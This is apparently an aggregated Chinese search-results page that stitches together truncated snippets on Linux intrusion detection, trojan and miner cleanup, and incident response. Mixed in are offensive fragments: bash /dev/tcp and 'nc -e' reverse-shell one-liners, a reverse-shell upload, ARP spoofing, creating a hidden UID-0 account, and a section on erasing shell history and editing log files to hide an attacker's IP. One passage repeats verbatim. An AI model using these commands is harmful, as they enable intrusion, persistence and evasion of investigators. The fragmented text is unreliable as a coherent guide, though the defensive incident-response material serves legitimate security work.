记录一次查询清除木马过程 木马名称: Linux.BackDoor.Gates.5 链接:https://forum.antichat.ru/threads/413337/ 前两天服务器被扫描后...对比下其他在正常服务器的显示如下: ? 怒了有没有!明显换了。换成程序大小为1.2M的了。 那就删掉被更改的,从其他同配置服务器拷贝一份。 记的拷贝过来要给予755 权限。 1 ?...FOUND为病毒 grep FOUND /root/usrclamav.log /usr/bin/.sshd: Linux.Trojan.Agent FOUND /usr/sbin/ss: Linux.Trojan.Agent...FOUND /usr/sbin/lsof: Linux.Trojan.Agent FOUND 如: “` ?...加强自身安全 但是此时还不知道系统入侵的原因,只能从两个方面考虑:暴力破解和系统及服务漏洞 a、yum update 更新系统(特别是bash、openssh和openssl) b、关闭一些不必要的服务
一般服务器被入侵的迹象,包括但不局限于:由内向外发送大量数据包(DDOS肉鸡)、服务器资源被耗尽(挖矿程序)、不正常的端口连接(反向shell等)、服务器日志被恶意删除等。...那么既然是入侵检测,首先要判断的是服务器是否被入侵,必须排除是管理员操作不当导致的问题,因此入侵检测的第一项工作就是询问管理员服务器的异常现象,这对之后入侵类型的判断非常重要。 ? ...注:linux设置空口令:passwd -d username 四、检查进程 一般被入侵的服务器都会运行一些恶意程序,或是挖矿程序,或者DDOS程序等等,如果程序运行着,那么通过查看进程可以发现一些信息...我们也可以通过检查服务器上是否留有入侵者放置的网站后门木马,以此判断黑客是否通过web应用入侵到服务器。...本文总结的都是一些Linux入侵检测最基础的命令,至于怎么用好这些命令,需要结合实际情况,主要还是看经验。
0x00 审计命令 在linux中有5个用于审计的命令: last:这个命令可用于查看我们系统的成功登录、关机、重启等情况;这个命令就是将/var/log/wtmp文件格式化输出。...(utmp、wtmp日志文件是多数Linux日志子系统的关键,它保存了用户登录进入和退出的记录。...像HTTP和FTP这样提供网络服务的服务器也保持详细的日志。 日志目录:/var/log(默认目录) 查看进程日志 cat /var/log/messages ?...0x02 用户查看 Linux不同的用户,有不同的操作权限,但是所有用户都会在/etc/passwd /etc/shadow /etc/group /etc/group- 文件中记录; 查看详细 注:linux...*:查看cron文件是变化的详细 ls /var/spool/cron/ 检查后门 对于linux的后门检查,网络上有一些公开的工具,但是在不使用这些工具的前提时,我们可以通过一些命令来获取一些信息。
search/ 命令输入pwd,这个命令是显示当前目录, 先看能不能编译 gcc -help 当前目录就是shell的目录,我在shell上传2.c 反弹shell 到外网自己机器的12345端口 上外网服务器.../arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254 下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器...3.利用跨站代码 linux不提权跨目录访问的代码 linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。 在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。...还是上传文件至服务器shell所在目录,执行命令ls,发现文件已经躺在那里面了,之后赋予exp执行权限。...(useradd -u 0 -o "username") 依次输入命令 cd /tmp sh-3.1# ls /lib/ld-linux* /lib/ld-linux.so.2 sh-3.1# cp /
如何判断自己的服务器是否被入侵了呢?仅仅靠两只手是不够的,但两只手也能起到一些作用,我们先来看看UNIX系统上一些入侵检测方法,以LINUX和solaris为例。...接下来根据找到入侵者在服务器上的文件目录,一步一步进行追踪。...6、检查系统中的core文件 通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法,典型的RPC攻击就是通过这种方式。...LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件,检查该文件的完整性,可以直接cat /etc/crontab,仔细阅读该文件有没有被入侵者利用来做其他的事情。...网络级的入侵,交换机、路由器上面的入侵和攻击行为,作为服务器的操作系统都无法得知;信息已经从主机发送出去了,如果在传送的介质当中被拦截,主机的操作系统是永远无动于衷的。
一.简介 黑入服务器很少会是通过账号密码的方式进入,因为这很难破解密码和很多服务器都做了限制白名单。...二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.../dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....三.NetCat 如果目标主机支持“-e”选项的话,我们就可以直接用 nc -e /bin/bash 10.42.0.1 1234 但当不支持时,我们就要用到Linux神奇的管道了。
1. 检查帐户 # less /etc/passwd # grep :0: /etc/passwd(检查是否产生了新用户,和UID、GID是0的用户) # ls...
/ 命令输入pwd,这个命令是显示当前目录, 先看能不能编译 gcc -help 当前目录就是shell的目录,我在shell上传2.c 反弹shell 到外网自己机器的12345端口 上外网服务器.../arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254 下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器...3.利用跨站代码 linux不提权跨目录访问的代码 linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。 在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。...还是上传文件至服务器shell所在目录,执行命令ls,发现文件已经躺在那里面了,之后赋予exp执行权限。...(useradd -u 0 -o "username") 依次输入命令 cd /tmp sh-3.1# ls /lib/ld-linux* /lib/ld-linux.so.2 sh-3.1# cp /
近日接到客户求助,他们收到托管电信机房的信息,通知检测到他们的一台服务器有对外发送攻击流量的行为。希望我们能协助排查问题。 ? 一、确认安全事件 情况紧急,首先要确认安全事件的真实性。...经过和服务器运维人员沟通,了解到业务只在内网应用,但服务器竟然放开到公网了,能在公网直接ping通,且开放了22远程端口。从这点基本可以确认服务器已经被入侵了。 ?...二、日志分析 猜想黑客可能是通过SSH暴破登录服务器。...在线查杀该文件为Linux后门程序。 ? 2)异常定时任务 通过查看crontab 定时任务,发现存在异常定时任务。 ? 分析该定时任务运行文件及启动参数 ? 在线查杀相关文件为挖矿程序 ?...加固建议 1)删除crontab 定时任务(删除文件/var/spool/cron/root内容),删除服务器上黑客植入的恶意文件。
一、背景 晚上看到有台服务器流量跑的很高,明显和平常不一样,流量达到了800Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包。...我们的服务器为了最好性能,防火墙(iptables)什么的都没有开启,但是服务器前面有物理防火墙,而且机器都是做的端口映射,也不是常见的端口,按理来说应该是满安全的,可能最近和木马有缘吧,老是让我遇到,...配置文件包含木马运行所必须的各种数据,如管理服务器IP地址和端口、后门程序安装参数等。...根据配置文件中的g_iGatsIsFx参数值,木马或主动连接管理服务器,或等待连接:成功安装后,后门程序会检测与其连接的站点的IP地址,之后将站点作为命令服务器。...与命令服务器设置连接后,Linux.BackDoor.Gates.5接收来自服务器的配置数据和僵尸电脑需完成的命令。
Linux入侵排查步骤 一:查看异常的进程 a、查看cpu占用最多的进程 运行top命令 交互式P键会根据CPU的占用大小进行排序 有的时候会遇到top之后cpu显示特别的低,但是服务器还特别的卡.../lastlog Last 列出截止目前登录过系统的用户信息 W 查看当前的登录账号信息 可以通过/var/log/secure文件 查看登录成功、失败等信息 六:查看最近一段时间被修改的文件 查找入侵时间点修改的文件...看是否有wget对外的异常链接 b、/etc/systemd/system/multi-user.target.wants 是否有服务的软连接 c、可以先kill -STOP $id 先禁止然后在进行排查 服务器要做好安全加固避免被入侵
使用VPS对公网IP地址进行全端口扫描,这次扫描的结果才符合,使用弱密码进行登录服务器成功。已经确定了攻击源,接下来对服务器进行分析。...首先给大家介绍Xshell工具,这个工具可以同时对多台服务器进行管理。 同时连接到四台服务器上,使用 top 命令查看占用CPU高的进程。...通过排查问题大致情况已确认,下载sysmd文件后续进行分析,修改开机启动脚本删除sysmd开机自启动,修改用户密码为复杂密码,禁用kernelsys用户,删除sysmd文件的执行权限,重启观察服务器运行情况...三、总结 本想找找入侵者IP反社工一下,未能如愿以偿,期待下次。
0x00 背景 周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。...0x02 作案动机 上面的计划任务的意思就是每15分钟去服务器上下载一个脚本,并且执行这个脚本。我们把脚本下载下来看一下。...好了,配置文件准备好了,就开始利用masscan进行全网扫描redis服务器,寻找肉鸡,注意看这6379就是redis服务器的默认端口,如果你的redis的监听端口是公网IP或是0.0.0.0,并且没有密码保护...那么问题是,这台服务器是怎么中招的呢?看了下redis.conf,bind的地址是127.0.0.1,没啥问题。...1,禁用公网IP监听,包括0.0.0.0 2,使用密码限制访问redis 3,使用较低权限帐号运行redis 到此,整个入侵过程基本分析完了,如果大家对样本有兴趣,也可以自行去curl,或是去虚拟机执行上面的脚本
场景: 周一上班centos服务器ssh不可用,web和数据库等应用不响应。...好在vnc可以登录 使用last命令查询,2号之前的登录信息已被清空,并且sshd文件在周六晚上被修改,周日晚上2点服务器被人远程重启 使用less /var/log/messages命令2点结合last...a 即append,设定该参数后,只能向文件中添加数据,而不能删除,多用于服务器日志文件安全,只有root才能设定这个属性 使用 chattr -ia /usr/sbin/sshd修改文件的隐藏属性,取消对应设置之后删除成功
服务器入侵排除命令 1.
常见入侵 挖矿 # 表象:CPU增高、可疑定时任务、外联矿池IP。...# 告警:Hids(主要)、流量监控设备 # 动作:确认Webshell文件内容与可用性→ 酌情断网,摘掉公网出口IP→ 通过日志等确认Webshell文件访问记录→ 确定Webshell入侵来源, #...内网入侵 # 表象:以入侵的跳板机为源头进行端口扫描、SSH爆破、内网渗透操作、域控攻击等。...# 告警:Hids(主要)、蜜罐、域控监控(ATA等) # 动作:确定入侵边界再进行处理,通常蜜罐等存在批量扫描爆破记录,需登录前序遭入侵机器确认情况, # 方便后续批量处理,这个情况较为复杂后期单独写一篇文章...3.查询通过TCP、UDP连接服务器的IP地址列表:netstat -ntu ,查询可疑连接:netstat -antlp 4.查询守护进程:lsof -p $pid 5.查询进程命令行:ps -aux
背景 周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。...作案动机 上面的计划任务的意思就是每 15 分钟去服务器上下载一个脚本,并且执行这个脚本。我们把脚本下载下来看一下。...好了,配置文件准备好了,就开始利用 masscan 进行全网扫描 Redis 服务器,寻找肉鸡。...那么问题是,这台服务器是怎么中招的呢?看了下 redis.conf,bind 的地址是127.0.0.1,没啥问题。...Redis 禁用公网 IP 监听,包括 0.0.0.0 使用密码限制访问 Redis 使用较低权限帐号运行 Redis 至此,整个入侵过程基本分析完了,如果大家对样本有兴趣,也可以自行去Curl,或是去虚拟机执行上面的脚本
0x00 前言 故事是这样的,大年初一,客户反应他们服务器无法访问,查看路由,发现某oracle+tomcat服务器UDP流量超大,把带宽占完了,过年嘛,客户那边先找了当地的技术人员弄了几天没搞定,然后没办法大年初三的找我们弄...并查看文件创建时间,与入侵时间吻合。 ? 顺便把文件拷贝下来放到kali虚拟机试了下威力,几秒钟的结果如下... ? ? 之前还以为是外国人搞的,这应该能证明是国人搞的了... ?...既然被人入侵了,首先还是把防火墙的SSH映射关掉吧,毕竟服务器现在还要用,还是写几条iptables规则吧 iptables -A OUTPUT -o lo -j ACCEPT 允许本机访问本机 iptables...如上图,使用印尼IP爆破成功,而后面服务器内网IP登陆竟然是失败,问了客户,算是明白了怎么回事,他们年底加设备,给服务器临时改了弱密码方便各种第三方技术人员调试,然后估计忘了改回来,结果悲剧了,被坏人登陆了不说...坏人的操作过程基本就在这里了,他执行了好多脚本,谁知道他干了多少事,还是建议客户重装系统吧... 0x04 后记 主要还是自己经验尚浅,linux运维玩的不熟,不知道怎么把马儿彻底赶出去...大牛勿喷。
在攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉。...HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 02、清除系统日志痕迹 Linux...'/自己的ip/'d /var/log/messages # 全局替换登录IP地址: sed -i 's/192.168.166.85/192.168.1.1/g' secure 03、清除web入侵痕迹
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
